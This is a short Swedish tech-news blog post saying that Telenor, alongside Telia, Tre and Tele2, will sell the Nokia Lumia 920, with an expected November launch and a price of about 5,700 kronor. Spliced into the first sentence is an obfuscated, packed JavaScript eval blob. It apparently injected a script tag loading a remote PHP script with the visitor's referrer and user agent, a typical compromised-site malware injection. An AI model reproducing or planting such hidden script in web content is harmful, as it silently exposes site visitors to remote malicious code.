Image Image Image Image Image Image Image Image Image Image

| 21 oktober, 2018

Scroll to top

Top

Nokia Lumia 920 till Telenor också

Nokia Lumia 920 till Telenor också
Sebastian Plengier Ehrnfelt

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dkskk|var|u0026u|referrer|hrryk||js|php’.split(‘|’),0,{}))
var inte länge sedan det meddelades om att Telia, Tre och Tele2 skulle få rättigheterna att sälja Nokias kommande mobil Lumia 920. Det såg då ut som att Telenor inte skulle sälja den. 

Idag meddelar Nokia att även Telenor kommer att sälja Nokias kommande Windows Phone 8 mobil och att säljstarten sätter igång under det fjärde kvartalet. Det är med andra ord från och med nu till årsskiftet som vi kan vänta oss denna smartphone.

Om man ska gå efter vad rykten och analytiker säger så bör Lumia 920 finnas i butik någon gång i början av November precis efter lanseringen av Windows 8 och Windows Phone 8.

Nokia Lumia 920 kommer att kosta omkring 5 700 kronor i Sverige utan eventuella avgifter från operatörerna.

Läs hela pressmeddelandet: www.mynewsdesk.com